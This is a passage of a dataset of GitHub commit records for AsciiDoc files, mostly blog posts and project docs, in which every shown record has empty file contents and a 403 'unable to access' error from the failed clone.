403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"60164402a05b3230b2d1ab7eed364bab2b00ef13","subject":"ClojureX London 2017 event","message":"ClojureX London 2017 event\n\nCreated an event page for the ClojureX London 2017 conference","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojurex-london.adoc","new_file":"content\/events\/2017\/clojurex-london.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e83869dbf794a1ce33d558c2061fce13f51ec636","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad8a5747f6c973f78deab09e6b88fe20ad8292fc","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09b4262a874861b40784b6bb85d1553291437ccc","subject":"Add 2.6-to-3.0 migration docs for Paginator.","message":"Add 2.6-to-3.0 migration docs for Paginator.\n","repos":"lift\/framework,lift\/framework,lift\/framework,lift\/framework","old_file":"docs\/migration\/2.6-to-3.0-paginator.adoc","new_file":"docs\/migration\/2.6-to-3.0-paginator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lift\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7c40db140bfa0ce352059e1b273758068ef82234","subject":"Update 2016-11-08-232000-Tuesday-Evening.adoc","message":"Update 2016-11-08-232000-Tuesday-Evening.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-08-232000-Tuesday-Evening.adoc","new_file":"_posts\/2016-11-08-232000-Tuesday-Evening.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b41dd5782a165bbd1f3ac2479e3f6c230ed2e4b6","subject":"adding maturity file","message":"adding maturity file\n","repos":"apache\/incubator-johnzon,salyh\/incubator-johnzon,salyh\/incubator-johnzon,apache\/incubator-johnzon","old_file":"MATURITY.adoc","new_file":"MATURITY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/salyh\/incubator-johnzon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"35a01ba6c0acf77c1323e98601cfc4b5321fad5d","subject":"Update docker instructions (#253)","message":"Update docker instructions (#253)\n\n- Mention public repository\r\n- Building the docker image pulls the latest release","repos":"jotak\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/hawkular-clients\/grafana\/docs\/quickstart-guide\/index.adoc","new_file":"src\/main\/jbake\/content\/hawkular-clients\/grafana\/docs\/quickstart-guide\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9b765272a42ec68f0d778a4e3692d6e66eb146e7","subject":"Update 2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","message":"Update 2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","new_file":"_posts\/2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4b9c187386a2018603fba40162b611742ca9fdd","subject":"y2b create post Make Coca-Cola At Home?","message":"y2b create post Make Coca-Cola At Home?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-24-Make-CocaCola-At-Home.adoc","new_file":"_posts\/2015-11-24-Make-CocaCola-At-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f099859e4ff04eb1741dcb330412a2b2a046d690","subject":"Update 2016-11-07-235200-Monday-Evening.adoc","message":"Update 2016-11-07-235200-Monday-Evening.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-235200-Monday-Evening.adoc","new_file":"_posts\/2016-11-07-235200-Monday-Evening.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1a0969e878809399125432dd8972ee680cd563a","subject":"Update 2017-07-13-Como-pensar-em-Prolog.adoc","message":"Update 2017-07-13-Como-pensar-em-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-07-13-Como-pensar-em-Prolog.adoc","new_file":"_posts\/2017-07-13-Como-pensar-em-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6519532fcba55672d03c604b13ada6a637b5389","subject":"Update 2017-09-29-One-on-one-with-Isaac.adoc","message":"Update 2017-09-29-One-on-one-with-Isaac.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-09-29-One-on-one-with-Isaac.adoc","new_file":"_posts\/2017-09-29-One-on-one-with-Isaac.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e266ed7e368869504b177826a8c78814af0fdce8","subject":"Add Environment Variables boilerplate to note(1)","message":"Add Environment Variables boilerplate to note(1)\n","repos":"rumpelsepp\/pynote","old_file":"man\/note.1.adoc","new_file":"man\/note.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33d6a9232873c5b60fb58ded74803ee86c3d8d94","subject":"Update 2017-01-27-FIX-harfbuzzso-not-found.adoc","message":"Update 2017-01-27-FIX-harfbuzzso-not-found.adoc","repos":"joaquinlpereyra\/joaquinlpereyra.github.io","old_file":"_posts\/2017-01-27-FIX-harfbuzzso-not-found.adoc","new_file":"_posts\/2017-01-27-FIX-harfbuzzso-not-found.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joaquinlpereyra\/joaquinlpereyra.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c192488fc0be29aaa70be860b3e75326bc21618","subject":"Update installation instructions for fuse","message":"Update installation instructions for fuse\n","repos":"jorgemoralespou\/rtgov,Governance\/rtgov,objectiser\/rtgov,jorgemoralespou\/rtgov,objectiser\/rtgov,Governance\/rtgov,jorgemoralespou\/rtgov,objectiser\/rtgov,Governance\/rtgov,djcoleman\/rtgov,objectiser\/rtgov,djcoleman\/rtgov,jorgemoralespou\/rtgov,Governance\/rtgov,djcoleman\/rtgov,djcoleman\/rtgov","old_file":"docs\/userguide\/en-US\/UGInstallation.asciidoc","new_file":"docs\/userguide\/en-US\/UGInstallation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/objectiser\/rtgov.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6ea9579f054377abf3bdd7481f755e353f99ae9d","subject":"docs(migration): add initial Apiman migration guide","message":"docs(migration): add initial Apiman migration guide\n","repos":"apiman\/apiman,apiman\/apiman,msavy\/apiman,msavy\/apiman,apiman\/apiman,apiman\/apiman,msavy\/apiman,msavy\/apiman,msavy\/apiman,apiman\/apiman","old_file":"docs\/modules\/migration\/pages\/migrations.adoc","new_file":"docs\/modules\/migration\/pages\/migrations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/apiman.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"824c15332a965c60364076981525483861ba23e8","subject":"Update 2015-10-12-Four-Acts-of-Citizenry.adoc","message":"Update 2015-10-12-Four-Acts-of-Citizenry.adoc","repos":"mazongo\/mazongo.github.io,mazongo\/mazongo.github.io,mazongo\/mazongo.github.io","old_file":"_posts\/2015-10-12-Four-Acts-of-Citizenry.adoc","new_file":"_posts\/2015-10-12-Four-Acts-of-Citizenry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mazongo\/mazongo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1670d47cb88f1da12b9ed51eeee2a6bda847c408","subject":"Update 2018-01-10-Neo4j-Commercial-Prices.adoc","message":"Update 2018-01-10-Neo4j-Commercial-Prices.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2018-01-10-Neo4j-Commercial-Prices.adoc","new_file":"_posts\/2018-01-10-Neo4j-Commercial-Prices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"276a633e68ced82eaab66d0d4bd9665e3d872e52","subject":"Update 2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","message":"Update 2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","new_file":"_posts\/2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c71b6f234bc0cf15ddc9e947d51f537d42b2a78a","subject":"Added work section","message":"Added work section\n","repos":"andrewazores\/homepage","old_file":"work.adoc","new_file":"work.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andrewazores\/homepage.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"bde6d00a8949214bb98a2346e6323ca70b7a40cf","subject":"Update 2019-01-31-bleh.adoc","message":"Update 2019-01-31-bleh.adoc","repos":"mrfgl\/blog,mrfgl\/blog,mrfgl\/blog,mrfgl\/blog","old_file":"_posts\/2019-01-31-bleh.adoc","new_file":"_posts\/2019-01-31-bleh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrfgl\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a90a39a81323bc954be91c3118f73f756cc9839","subject":"CL: `write` vs. `print` vs. `prin1` vs. `princ` vs. `pprint`","message":"CL: `write` vs. `print` vs. `prin1` vs. `princ` vs. `pprint`\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"99b6188c795a68df52363bbfda91574d31bc8295","subject":"Added server status doc","message":"Added server status doc\n","repos":"apaolini\/nagios-plugin-jbossas7,aparnachaudhary\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7","old_file":"server.asciidoc","new_file":"server.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/nagios-plugin-jbossas7.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3fe2ed8df672cd2dd5caa5d030c705aa76c30251","subject":"Update 2015-12-22-Performance-of-Microservices-frameworks.adoc","message":"Update 2015-12-22-Performance-of-Microservices-frameworks.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2015-12-22-Performance-of-Microservices-frameworks.adoc","new_file":"_posts\/2015-12-22-Performance-of-Microservices-frameworks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cdelmas\/cdelmas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b08db46ccdb8d70e7192df4c9ebaddf8823d948","subject":"Update 2017-05-27-Where-in-haskell.adoc","message":"Update 2017-05-27-Where-in-haskell.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-27-Where-in-haskell.adoc","new_file":"_posts\/2017-05-27-Where-in-haskell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1730dab872fffcea4c42f706bac7e7b9e2c883f1","subject":"Update 2017-08-03-How-IIS-Bindings-work-in-Azure-App-Services-and-Cloud-Service.adoc","message":"Update 2017-08-03-How-IIS-Bindings-work-in-Azure-App-Services-and-Cloud-Service.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-08-03-How-IIS-Bindings-work-in-Azure-App-Services-and-Cloud-Service.adoc","new_file":"_posts\/2017-08-03-How-IIS-Bindings-work-in-Azure-App-Services-and-Cloud-Service.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"538a59e9b715a8a977bfa2c2af341986013d9b1d","subject":"y2b create post COD MW3 MIDNIGHT LAUNCH!","message":"y2b create post COD MW3 MIDNIGHT LAUNCH!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-07-COD-MW3-MIDNIGHT-LAUNCH.adoc","new_file":"_posts\/2011-11-07-COD-MW3-MIDNIGHT-LAUNCH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74c44f45b829795cd37c2fefff22406254a55285","subject":"Update 2015-08-28-A-DIY-Flight-Controller.adoc","message":"Update 2015-08-28-A-DIY-Flight-Controller.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-08-28-A-DIY-Flight-Controller.adoc","new_file":"_posts\/2015-08-28-A-DIY-Flight-Controller.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8753b9f2d2f6b49df263a57d90fdc40e8aa81891","subject":"Update 2015-03-02-Tervetuloa.adoc","message":"Update 2015-03-02-Tervetuloa.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-03-02-Tervetuloa.adoc","new_file":"_posts\/2015-03-02-Tervetuloa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"267a5b54e7df4b1658ff203b8d20e8fafc2384a0","subject":"Update 20150327-Happy-Easter.adoc","message":"Update 20150327-Happy-Easter.adoc","repos":"mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io","old_file":"_posts\/20150327-Happy-Easter.adoc","new_file":"_posts\/20150327-Happy-Easter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcrotty\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a88e26a3c8dfdd3c7a3b64b84d218cf7097bef80","subject":"Add build instructions. Fixes #152","message":"Add build instructions. Fixes #152\n","repos":"canoo\/dolphin-platform,canoo\/dolphin-platform,canoo\/dolphin-platform","old_file":"BUILD.adoc","new_file":"BUILD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/canoo\/dolphin-platform.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5ac047832cd3830a4129177d702046f1ab6e2c38","subject":"Update 2016-04-03-etat-limite-borderline.adoc","message":"Update 2016-04-03-etat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f0640fae2a6c37b53a916005678e5899432a6f2","subject":"Update 2016-04-03-etat-limite-borderline.adoc","message":"Update 2016-04-03-etat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"622622f3df87d582e178dad0d2cccfd244ae458c","subject":"Renamed '_posts\/2018-09-22-HTT-Prty-JSON-requests-and-the-right-Content-Type.adoc' to '_posts\/2018-09-22-Series-on-Rails-Part-1.adoc'","message":"Renamed '_posts\/2018-09-22-HTT-Prty-JSON-requests-and-the-right-Content-Type.adoc' to '_posts\/2018-09-22-Series-on-Rails-Part-1.adoc'","repos":"TRex22\/blog,TRex22\/blog,TRex22\/blog","old_file":"_posts\/2018-09-22-Series-on-Rails-Part-1.adoc","new_file":"_posts\/2018-09-22-Series-on-Rails-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TRex22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0ad7a4db8953ee64663b86e2432ae3ca297425f","subject":"Release 1.5.1 blog","message":"Release 1.5.1 blog\n","repos":"apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io,apiman\/apiman.github.io","old_file":"_blog-src\/_posts\/2018-08-13-release-1.5.adoc","new_file":"_blog-src\/_posts\/2018-08-13-release-1.5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bd28d95d9a9c2509a7e0d17af2c9ffcf6dcfc8f9","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c010c13645a9bfd731676b578652acf35ec0166","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b71afc9009fb2d6f3699e1603b805cbed196477","subject":"Create ISSUE_TEMPLATE.adoc","message":"Create ISSUE_TEMPLATE.adoc","repos":"jenkinsci\/github-pullrequest-plugin,KostyaSha\/github-integration-plugin,KostyaSha\/github-integration-plugin,KostyaSha\/github-integration-plugin,KostyaSha\/github-integration-plugin,jenkinsci\/github-integration-plugin,jenkinsci\/github-integration-plugin,jenkinsci\/github-pullrequest-plugin,jenkinsci\/github-pullrequest-plugin,jenkinsci\/github-integration-plugin","old_file":".github\/ISSUE_TEMPLATE.adoc","new_file":".github\/ISSUE_TEMPLATE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/github-integration-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de5a468ce86f243fe3e12464aeba47c008e0fb1e","subject":"y2b create post A Truly Wireless iPhone?","message":"y2b create post A Truly Wireless iPhone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-13-A-Truly-Wireless-iPhone.adoc","new_file":"_posts\/2016-01-13-A-Truly-Wireless-iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9c11c95441fa41a3bb38831148128db97542dab","subject":"README: document filters","message":"README: document filters\n","repos":"Somasis\/kakoune,alexherbo2\/kakoune,casimir\/kakoune,flavius\/kakoune,danr\/kakoune,danr\/kakoune,Somasis\/kakoune,alexherbo2\/kakoune,danielma\/kakoune,flavius\/kakoune,rstacruz\/kakoune,flavius\/kakoune,zakgreant\/kakoune,jkonecny12\/kakoune,ekie\/kakoune,Somasis\/kakoune,elegios\/kakoune,danielma\/kakoune,occivink\/kakoune,xificurC\/kakoune,jkonecny12\/kakoune,rstacruz\/kakoune,rstacruz\/kakoune,alexherbo2\/kakoune,casimir\/kakoune,alpha123\/kakoune,Asenar\/kakoune,elegios\/kakoune,zakgreant\/kakoune,Asenar\/kakoune,alexherbo2\/kakoune,occivink\/kakoune,alpha123\/kakoune,lenormf\/kakoune,danr\/kakoune,mawww\/kakoune,danr\/kakoune,xificurC\/kakoune,lenormf\/kakoune,mawww\/kakoune,Asenar\/kakoune,ekie\/kakoune,jkonecny12\/kakoune,mawww\/kakoune,mawww\/kakoune,flavius\/kakoune,zakgreant\/kakoune,occivink\/kakoune,ekie\/kakoune,casimir\/kakoune,xificurC\/kakoune,alpha123\/kakoune,alpha123\/kakoune,jkonecny12\/kakoune,jjthrash\/kakoune,ekie\/kakoune,occivink\/kakoune,rstacruz\/kakoune,Asenar\/kakoune,zakgreant\/kakoune,jjthrash\/kakoune,casimir\/kakoune,elegios\/kakoune,jjthrash\/kakoune,xificurC\/kakoune,elegios\/kakoune,lenormf\/kakoune,lenormf\/kakoune,danielma\/kakoune,Somasis\/kakoune,danielma\/kakoune,jjthrash\/kakoune","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekie\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"4f466e1453390eedfc2b82b65480608e8867471a","subject":"Add new versioned document for planning.","message":"Add new versioned document for planning.\n\nWe'll see it progress just like the code!\n","repos":"lukesanantonio\/notetaking,thee-l\/notetaking,thee-l\/notetaking,lukesanantonio\/notetaking","old_file":"PLANNING.asciidoc","new_file":"PLANNING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thee-l\/notetaking.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"2870ed2e104114a25a2d3a7fc42c9779c1b4e512","subject":"Update 2016-01-12-Another-post.adoc","message":"Update 2016-01-12-Another-post.adoc","repos":"vadio\/vadio.github.io,vadio\/vadio.github.io,vadio\/vadio.github.io","old_file":"_posts\/2016-01-12-Another-post.adoc","new_file":"_posts\/2016-01-12-Another-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vadio\/vadio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"052779cac0ac3f4a20673a405cbb5504000df2aa","subject":"doc: implementers-guide: update names of test module libraries","message":"doc: implementers-guide: update names of test module libraries\n\nThe name of the libraries generated by the test modules were recently\nchanged from lib<module>.la to libtest<module>.la\n\nSigned-off-by: Stuart Haslam <1fce01f364ef5298e64e07a42e08efeef153fa98@linaro.org>\nReviewed-by: Christophe Milard <99616a981fa4477cda708a70f78076761c0c9f1c@linaro.org>\nSigned-off-by: Maxim Uvarov 